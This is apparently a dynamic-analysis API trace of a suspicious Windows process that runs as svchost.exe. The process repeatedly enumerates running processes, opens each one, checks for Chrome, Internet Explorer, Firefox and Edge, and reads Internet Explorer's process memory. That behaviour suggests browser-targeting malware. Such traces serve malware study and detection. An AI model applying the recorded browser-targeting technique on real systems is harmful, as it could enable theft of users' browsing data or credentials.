	[0196.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0196.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0196.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.137] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0196.137] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.138] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.138] NtQueryInformationProcess (in: ProcessHandle=0x10f0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0196.138] ReadProcessMemory (in: hProcess=0x10f0, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0196.138] ReadProcessMemory (in: hProcess=0x10f0, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0196.145] ReadProcessMemory (in: hProcess=0x10f0, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0196.145] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0196.145] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x10f4
	[0196.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.146] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.147] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.147] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.147] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.147] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0196.148] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x10f8
	[0196.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.149] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0196.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.149] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.150] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0196.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.150] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.150] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.151] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x10fc
	[0196.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.152] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.152] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.153] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.153] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.153] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.154] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0196.155] CloseHandle (hObject=0x188) returned 1
	[0196.156] Sleep (dwMilliseconds=0x64) 
	[0196.268] GetCurrentProcessId () returned 0x110
	[0196.268] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0196.271] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0196.271] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0196.272] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0196.273] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x1100
	[0196.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.273] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.273] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.273] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.273] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.274] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.274] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x1104
	[0196.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.275] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.275] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.275] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.276] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.276] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0196.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x1108
	[0196.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.277] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0196.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.277] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.277] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0196.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.278] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.278] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0196.279] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x110c
	[0196.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.279] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0196.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.279] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.279] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0196.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.280] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.280] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0196.281] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x1110
	[0196.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.281] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0196.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.281] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.281] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0196.282] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.282] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.282] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0196.283] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x1114
	[0196.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.283] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0196.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.283] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.284] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0196.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.284] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.284] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0196.285] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x1118
	[0196.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.285] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0196.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.285] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.286] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0196.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.286] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.286] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0196.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x111c
	[0196.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.287] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0196.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.287] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.287] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0196.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.288] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.288] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.288] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x1120
	[0196.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.289] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.289] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.289] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.290] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.290] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x1124
	[0196.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.291] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.291] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.291] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.292] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.293] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x1128
	[0196.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.293] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.293] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.293] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.294] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.294] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.295] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x112c
	[0196.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.295] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.295] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.296] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.296] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.296] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x1130
	[0196.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.297] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.297] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.298] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.298] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.298] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.299] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x1134
	[0196.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.299] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.299] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.300] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.300] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.300] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.301] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x1138
	[0196.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.301] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.302] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.302] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.302] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.302] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0196.303] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x113c
	[0196.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.303] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0196.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.304] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.304] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0196.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.304] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.304] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0196.305] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1140
	[0196.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.305] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.305] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.305] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.306] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.306] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.306] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0196.307] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1144
	[0196.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.307] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0196.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.307] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.308] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0196.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.308] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0196.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0196.309] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1148
	[0196.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.309] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0196.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.309] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0196.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.310] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0196.310] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0196.310] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
